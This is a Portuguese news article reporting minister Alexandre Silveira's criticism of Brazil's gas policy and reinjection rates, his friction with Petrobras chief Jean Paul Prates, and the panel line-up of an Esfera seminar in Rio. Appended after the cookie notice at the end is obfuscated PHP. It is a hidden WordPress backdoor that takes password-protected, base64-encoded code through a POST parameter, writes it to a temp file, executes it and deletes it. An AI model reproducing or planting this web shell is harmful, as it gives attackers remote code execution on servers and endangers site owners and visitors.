• 16.06.2023
  • Redação

“Houve desdém com o gás nos últimos anos”, diz Alexandre Silveira

Ministro diz que prefere lidar com a “cara fechada” do presidente da Petrobras do que mudar os objetivos

O ministro de Minas e Energia, Alexandre Silveira (PSD), disse que o país tratou o gás natural com desdém nos últimos anos. Segundo ele, está em curso uma mudança nesse tratamento. Ele afirmou que prefere lidar com o que chamou de “cara fechada” do presidente da Petrobras, Jean Paul Prates, do que deixar de focar no tema.

Houve um desdém com a politica do gás nos últimos anos. Basta dizer que a rota 3 esta aí para ser terminada há quanto tempo? Nossas UPGNs [Unidade de Tratamento do Gás Natural] estão sucateadas. Poderiam produzir mais. Essa política do gás é uma obsessão para nós“, disse o ministro em apresentação em evento do Grupo Esfera realizado nesta 6ª feira (16.jun.2023) no Rio.

Silveira criticou a política de reinjeção de gás de volta nas jazidas. Ele comparou os números com os de outros países e continentes para dizer que o Brasil usa menos da commodity que outros lugares do mundo.

“Os Estados Unidos reinjetam 12,5% para impulsionar a produção de petróleo. A África, 23,9%. A Europa, 24,7%. O Brasil, 44,6%. É uma reinjeção, que se não tiver uma explicação, e até agora não conseguiram me explicar, completamente desproporcional“, disse. Em 2022, o país reinjetou 50% do gás.

Silveira disse que, apesar de caro, é possível ampliar a rede de gasodutos do país. “Temos que aumentar a oferta de gás na costa brasileira e fazer as novas rotas de escoamento com velocidade. Não é barato, mas é viável“, disse. De 2013 a 2022, o país aumentou em 1% a malha de gasodutos do país. Já a infraestrutura de distribuição teve um crescimento de 107% no mesmo período. Os dados são da Abegás (Associação Brasileira das Empresas Distribuidoras de Gás Canalizado).

EMBATE COM JEAN PAUL Alexandre Silveira e Jean Paul Prates têm tido embates nos últimos meses. Silveira disse, no evento, que prefere lidar com a “cara fechada” do executivo do que desistir do plano para o gás. “Temos uma política pública que não vamos abrir mão. Entre agradar o Jean Paul e cumprir um compromisso do governo com a sociedade brasileira de gerar emprego, gerar oportunidade, combater desigualdade, eu prefiro que ele feche a cara, mas que nós possamos lograr êxito nessa política pública. Personificar entre o ministro e o presidente da Petrobras é um equívoco“, declarou.

Silveira deu entrevista ao jornal Valor Econômico dizendo que há “negligência e desdém” da chefia da Petrobras com o gás.

Assista (1h56m25s):

ESFERA NO RIO O Grupo Esfera organizou o evento “Seminário Esfera RJ – segurança e harmonia para o capital”. Foi realizado na cidade do Rio de Janeiro. Foram programados 4 painéis ao longo da 6ª feira (16.jun). Eis a programação:

Painel 1 – Oportunidades de Investimento no Rio. Eis a composição: Nicola Miccione, secretário da Casa Civil do Rio; Aguinaldo Ballon, diretor-presidente da Cedae; Alexandre Bianchini, Águas do Rio.

Painel 2 – Rio, nova fronteira energética. Eis a composição: Hugo Leal, secretário de energia e economia do mar do Rio; Rodolfo de Saboia, presidente da ANP; Adriano Pires, presidente do CBIE e colunista do Poder360; Alexandre D’Ambrosio, vice-presidente de assuntos corporativos e institucionais da Vale.

Painel 3 – Investimentos em habitação e infraestrutura. Eis a composição: Jader Filho, ministro das Cidades; Claudio Castro, governador do Rio; Alexandre Silveira, ministro de Minas e Energia.

Painel 4 – Rio de braços abertos. Eis a composição: Claudio Castro, governador do Rio; Rodrigo Bacellar, presidente da Alerj; Ricardo Cardoso, presidente do TJRJ.

O editor sênior Guilherme Waltenberg viajou ao Rio a convite da Esfera Brasil.

x

Utilizamos cookies e outras tecnologias para lhe oferecer uma experiência de navegação melhor, analisar o tráfego do site e personalizar o conteúdo, de acordo com a nossa Política de Privacidade. Ao continuar navegando, você concorda com estas condições.

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}